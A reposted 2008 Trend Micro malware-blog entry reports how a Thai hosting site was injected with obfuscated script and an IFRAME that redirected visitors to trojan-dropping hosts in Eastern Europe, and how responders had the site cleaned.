Monday, March 10, 2008 12:00 PM
cmosby
Yet another Thai Site compromised by EU Malware Authors | TrendLabs | Malware Blog - by Trend Micro
March 9th, 2008 by Joseph Pacamarra
Research Project Manager Ivan Macalintal reported a few hours ago that another Thailand-based Web hosting site appears to have been compromised to serve malware.
APAC-Regional TrendLabs Team immediately probed and analyzed the attack layout for the ill-fated www.ictbannok.com and we identified a tricky injection, which was prematurely implemented.
Based on our analysis, the main site is just about to be heavily laden with scripts when it was first reported. Going further, since it looks like a dead end when we tried a different avenue and since the main page itself is just like a site with a script gone bad, we found this:
|
http://www.ictbannok.com /*
(Cloaking with a 404 error still heavily laden with an encrypted script which lead to)
|
hxxp://www.ictbannok.com.96fad701b73f1f53.2traff.cn/traff2.cn/
|
Host Location Estiona
|
Host Location European Union
[Russian Federation]
|
The following malicious files are set to drop at this point namely
Troj_SHEUR.DZJ and TROJ_INJECT.IS
|
Host Location Ukraine
|
TSPY_LDPINCH.JR
These tiers were brought down 20 minutes or less after the probing was done. Too late for the authors of the attack, their tracks were traced back pin-pointing the actual file they were hoping to implement using Obfuscation and IFRAME as a drop-off point.
With coordinated effort from APAC-RTL spearheaded by Oscar R., Trend Micro Thailand Office by Wan K. and Kitisak J. of ThaiCert – the ictbannok.com site administrator was advised about the incident and had the site cleaned in no time. Now its back in its regular business.
Trend Micro already detects these files since the release of malware control patch number 5.144.05 using scan engine 8.5001002 or later.
Source: Yet another Thai Site compromised by EU Malware Authors | TrendLabs | Malware Blog - by Trend Micro
Filed under: Security and Anti-Virus, Internet Hacks, Cybercrime